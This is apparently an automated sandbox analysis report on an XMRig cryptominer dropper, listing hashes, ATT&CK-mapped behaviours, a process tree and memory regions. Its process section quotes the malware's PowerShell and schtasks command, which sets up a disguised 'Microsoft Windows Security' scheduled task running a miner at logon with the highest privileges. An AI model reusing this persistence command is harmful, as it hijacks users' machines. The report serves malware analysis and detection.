Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/10/2024, 00:09

General

  • Target

    0x0006000000016d4e-54.exe

  • Size

    10KB

  • MD5

    96509ab828867d81c1693b614b22f41d

  • SHA1

    c5f82005dbda43cedd86708cc5fc3635a781a67e

  • SHA256

    a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744

  • SHA512

    ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

  • SSDEEP

    96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 13 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1236
      • C:\Users\Admin\AppData\Local\Temp\0x0006000000016d4e-54.exe
        "C:\Users\Admin\AppData\Local\Temp\0x0006000000016d4e-54.exe"
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1564
        • C:\Users\Admin\AppData\Local\Temp\3621011599.exe
          C:\Users\Admin\AppData\Local\Temp\3621011599.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2408
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
        2⤵
          PID:2320
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2708
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1936
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe
          2⤵
            PID:992
          • C:\Windows\System32\dwm.exe
            C:\Windows\System32\dwm.exe
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1268
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {ED16319A-B46C-4A9C-8A20-01941478863C} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:3012
          • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
            "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1948

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          66a8cf3f9cb8348dcfc201eb2d42924a

          SHA1

          fd04f7e8f6ca208c03662f4d3f1324d686a732ce

          SHA256

          798c8fddd54b5f0812c9b0428176e8cad353616d8541d4c2f9625338f6cf28b7

          SHA512

          dc9c41cab8cf34f7ac5b2649b62d0bda5251765395b15d16f39442d091e018d0aae656b51858b237ccdfc826e09eedc13267fdbc26cc086e133d2026e8b240a3

        • \Users\Admin\AppData\Local\Temp\3621011599.exe

          Filesize

          5.6MB

          MD5

          13b26b2c7048a92d6a843c1302618fad

          SHA1

          89c2dfc01ac12ef2704c7669844ec69f1700c1ca

          SHA256

          1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256

          SHA512

          d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455

        • memory/992-38-0x0000000140000000-0x0000000140029000-memory.dmp

          Filesize

          164KB

        • memory/992-40-0x0000000140000000-0x0000000140029000-memory.dmp

          Filesize

          164KB

        • memory/1268-37-0x0000000000230000-0x0000000000250000-memory.dmp

          Filesize

          128KB

        • memory/1268-55-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1268-49-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1268-47-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1268-45-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1268-41-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1268-53-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1268-51-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1268-43-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1268-57-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1268-59-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1268-61-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1268-39-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

        • memory/1948-36-0x000000013F510000-0x000000013FAA7000-memory.dmp

          Filesize

          5.6MB

        • memory/2640-20-0x000000013F280000-0x000000013F817000-memory.dmp

          Filesize

          5.6MB

        • memory/2708-31-0x0000000001F40000-0x0000000001F48000-memory.dmp

          Filesize

          32KB

        • memory/2708-30-0x000000001B610000-0x000000001B8F2000-memory.dmp

          Filesize

          2.9MB

        • memory/2804-17-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2804-16-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2804-15-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2804-13-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2804-14-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2804-10-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

          Filesize

          2.9MB

        • memory/2804-11-0x0000000001D40000-0x0000000001D48000-memory.dmp

          Filesize

          32KB

        • memory/2804-12-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2804-9-0x000007FEF5AEE000-0x000007FEF5AEF000-memory.dmp

          Filesize

          4KB